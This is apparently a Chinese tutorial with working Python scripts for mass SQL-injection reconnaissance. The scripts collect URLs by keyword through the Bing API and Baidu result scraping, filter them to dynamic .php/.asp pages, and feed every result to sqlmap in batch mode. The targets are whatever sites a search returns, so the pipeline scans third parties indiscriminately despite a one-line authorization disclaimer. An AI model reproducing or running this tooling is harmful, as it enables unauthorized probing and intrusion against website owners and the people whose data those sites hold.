思路 :
利用现有的搜索引擎API以及 Google Hacking 技术 , 批量进行关键字查询和注入点检测
分为三步 :
- URL采集
- 对采集到的URL进行过滤 , 剔除不可能存在注入点的URL , 例如静态页面等
- 注入点检测
参考资料 :
实现 :
URL采集 :
- 利用Bing提供的免费API , 进行URL采集 : (Bing.py)
#!/usr/bin/env python
#coding:utf8
"""Collect search-result URLs for a keyword via the Bing Web Search v5 API.

Requests up to ``maxPageNumber`` pages of ``pageSize`` results each and
prints one URL per line on stdout. Errors are reported on stderr and stop
the paging loop instead of raising a traceback.
"""
import requests
import json
import sys

# config-start
BingKey = ""  # config your bing Ocp-Apim-Subscription-Key
Keyword = "简书"
maxPageNumber = 10
pageSize = 10
# config-end

# Seconds to wait for the API before giving up; requests has no default
# timeout and would otherwise block forever on a stalled connection.
requestTimeout = 10

url = "https://api.cognitive.microsoft.com/bing/v5.0/search"
headers = {
    'Host': 'api.cognitive.microsoft.com',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    # 'br' is intentionally not advertised: requests can only decode brotli
    # when an optional brotli package is installed, and an undecoded body
    # would make the JSON parsing below fail.
    'Accept-Encoding': 'gzip, deflate',
    'Ocp-Apim-Subscription-Key': BingKey,
    'Upgrade-Insecure-Requests': '1',
    'Referer': 'https://api.cognitive.microsoft.com/bing/v5.0/search?q=opensns',
    'Connection': 'keep-alive',
}


def normalize_display_url(display_url):
    """Return ``display_url`` with an explicit scheme.

    URLs that already start with ``http://`` or ``https://`` are returned
    unchanged; anything else gets ``http://`` prepended.
    """
    if display_url.startswith(("http://", "https://")):
        return display_url
    return "http://" + display_url


def main():
    """Page through the search results and print every result URL."""
    for i in range(maxPageNumber):
        # Let requests build the query string so the keyword is URL-encoded.
        params = [
            ("q", Keyword),
            ("offset", i * pageSize),
            ("count", pageSize),
        ]
        try:
            response = requests.get(
                url, params=params, headers=headers, timeout=requestTimeout
            )
        except requests.RequestException as e:
            sys.stderr.write("Request failed: %s\n" % e)
            break
        if response.status_code != 200:
            sys.stderr.write(
                "Unexpected HTTP status %d for page %d\n"
                % (response.status_code, i)
            )
            break
        try:
            jsonObject = json.loads(response.text)
        except ValueError as e:
            sys.stderr.write("Response is not valid JSON: %s\n" % e)
            break
        # 'webPages' is absent when the API returns an error or no results.
        results = jsonObject.get('webPages', {}).get('value', [])
        if not results:
            break
        for result in results:
            resulturl = result.get('displayUrl')
            if not resulturl:
                continue
            print(normalize_display_url(resulturl))


if __name__ == "__main__":
    main()
- 利用开源HTML解析库对百度搜索结果页面进行解析 , 采集URL : (Baidu.py)
#!/usr/bin/env python
#coding:utf8
"""Collect result URLs from a Baidu search results page.

Fetches the results page for ``keyword``, finds every anchor that points
at a Baidu redirect link, follows that redirect and prints the final URL,
one per line, on stdout. Failures on individual links are reported on
stderr and skipped.
"""
import requests
from bs4 import BeautifulSoup
import sys

# config-start
keyword = "简书"
# config-end

# Seconds to wait per request; requests has no default timeout.
requestTimeout = 10

url = "http://www.baidu.com/s"

# Only Baidu redirect links are followed; both schemes are accepted.
redirectPrefixes = (
    "http://www.baidu.com/link?url=",
    "https://www.baidu.com/link?url=",
)


def main():
    """Fetch the results page and print the target of each redirect link."""
    try:
        # Passing the keyword via params lets requests URL-encode it.
        response = requests.get(
            url, params={"wd": keyword}, timeout=requestTimeout
        )
    except requests.RequestException as e:
        sys.stderr.write("Search request failed: %s\n" % e)
        return
    if response.status_code != 200:
        sys.stderr.write(
            "Unexpected HTTP status %d from search page\n"
            % response.status_code
        )
        return

    soup = BeautifulSoup(response.content, "html.parser")
    # href=True skips anchors without an href attribute.
    for link in soup.find_all("a", href=True):
        dstURL = link['href']
        if not dstURL.startswith(redirectPrefixes):
            continue
        try:
            # requests follows the redirect; .url is the final location.
            result_url = requests.get(dstURL, timeout=requestTimeout).url
        except requests.RequestException as e:
            # Best effort: report the failing link and keep going.
            sys.stderr.write("Skipping %s: %s\n" % (dstURL, e))
            continue
        print(result_url)


if __name__ == "__main__":
    main()
对静态页面等URL进行过滤
#!/usr/bin/env python
#coding:utf8
"""Filter a URL list down to pages that look dynamically generated.

Reads ``urls.txt`` (one URL per line) and prints every URL that does not
end in ``html``/``htm`` and contains ``.php`` or ``.asp``.
"""


def filter_urls(lines):
    """Yield the URLs from ``lines`` that pass the filter.

    Each line is stripped of surrounding whitespace (so a missing final
    newline or Windows ``\\r\\n`` endings do not corrupt the URL) and blank
    lines are ignored. A URL is dropped when it ends with ``html`` or
    ``htm``; otherwise it is kept only if it contains ``.php`` or ``.asp``.
    """
    for line in lines:
        content = line.strip()
        if not content:
            continue
        if content.endswith(("html", "htm")):
            continue
        if ".php" in content or ".asp" in content:
            yield content


def main():
    """Print the filtered contents of ``urls.txt``."""
    # The with-block guarantees the file is closed even on error.
    with open("urls.txt", "r") as url_file:
        for content in filter_urls(url_file):
            print(content)


if __name__ == "__main__":
    main()
检测注入点 :
#!/usr/bin/env python
#coding:utf8
"""Run sqlmap in batch mode against every URL listed in a file.

Usage: pass the path of a text file (one URL per line) as the first
command-line argument. Only run this against systems you are explicitly
authorized to test.
"""
import os
import subprocess
import sys

# Fixed sqlmap options applied to every target.
sqlmapOptions = [
    "--random-agent",
    "-f",
    "--batch",
    "--answer=extending=N,follow=N,keep=N,exploit=n",
]


def build_command(url):
    """Return the sqlmap argument list for ``url``.

    The URL is passed as its own argument rather than being spliced into a
    shell string, so characters such as ``&`` or ``;`` in a query string
    are never interpreted by a shell.
    """
    return ["sqlmap.py", "-u", url] + sqlmapOptions


def main():
    """Run sqlmap for each non-empty line of the file named in argv[1].

    Returns the process exit status: 1 when no file argument was given,
    0 otherwise.
    """
    if len(sys.argv) < 2:
        sys.stderr.write("Usage: %s <url-list-file>\n" % sys.argv[0])
        return 1
    with open(sys.argv[1], "r") as url_file:
        for line in url_file:
            # strip() instead of line[0:-1]: the last line may lack a newline.
            url = line.strip()
            if not url:
                continue
            print("*******************")
            command = build_command(url)
            print("Exec : " + " ".join(command))
            # No shell involved; assumes sqlmap.py is executable and on PATH.
            subprocess.call(command)
    return 0


if __name__ == "__main__":
    sys.exit(main())